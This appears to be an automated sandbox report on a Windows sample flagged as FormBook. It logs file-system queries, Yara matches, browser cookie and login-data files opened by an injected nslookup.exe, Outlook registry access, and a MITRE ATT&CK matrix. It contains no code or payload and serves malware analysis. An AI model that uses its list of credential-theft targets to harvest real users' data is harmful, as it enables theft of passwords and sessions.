Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4108291981.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4110076229.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4108473621.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984553272.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1991690472.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4108199784.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\nslookup.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4108291981.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4110076229.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4108473621.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984553272.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1991690472.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4108199784.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
